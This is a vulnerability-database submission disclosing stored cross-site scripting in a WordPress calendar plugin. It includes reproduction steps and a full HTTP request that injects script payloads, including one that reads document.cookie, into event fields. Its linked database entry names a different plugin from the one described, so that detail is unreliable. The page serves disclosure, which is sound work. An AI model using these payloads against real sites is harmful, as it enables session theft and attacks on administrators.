Submit #43714: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress. info

TitelMultiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress.
Beschreibung# Exploit Title: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Calendar Event Multi View plugin <=1.4.06 at WordPress. # Exploit Author: Mostafa Farzaneh (Mr.Pyweb) # Web Site: https://wordpress.dwbooster.com/calendars/cp-multi-view-calendar # Software Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ # Version : 1.4.06 # Tested on: Windows 10 # Category: WebApp # Date: 2022-05-25 # Description: An authenticated user is able to inject arbitrary JavaScript or HTML code to the " Admin Calendar Data page" on Subject and Location parameters This causes Stored XSS attack against the administrators or the other users. POC: 1- Go to CP Multi View Calendar tab and click on Admin Calendar Data. 2- click on calendar and Edit details. 3- add your payload in Subject and Location and Description parameters. Request: POST /wp/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=1&method=adddetails&id=2 HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 366 Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Subject=<script>alert(origin)</script>&colorvalue=%23C60&rrule=&rruleType=&stpartdate=05%2F10%2F2022&stparttime=00%3A00&etpartdate=05%2F16%2F2022&etparttime=00%3A00&stpartdatelast=05%2F10%2F2022&etpartdatelast=05%2F16%2F2022&stparttimelast=&etparttimelast=&IsAllDayEvent=1&Location=<script>alert('hacked')</script>&Description=<script>alert(document.cookie)</script>&timezone=4.5
Benutzer
 pyweb-security (UID 11883)
Einreichung15.08.2022 12:32 (vor 4 Jahren)
Moderieren16.08.2022 15:46 (1 day later)
StatusAkzeptiert
VulDB Eintrag206487 [MotoPress Timetable and Event Schedule bis 1.4.06 auf WordPress Calendar Subject/Location/Description Cross Site Scripting]
Punkte17

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!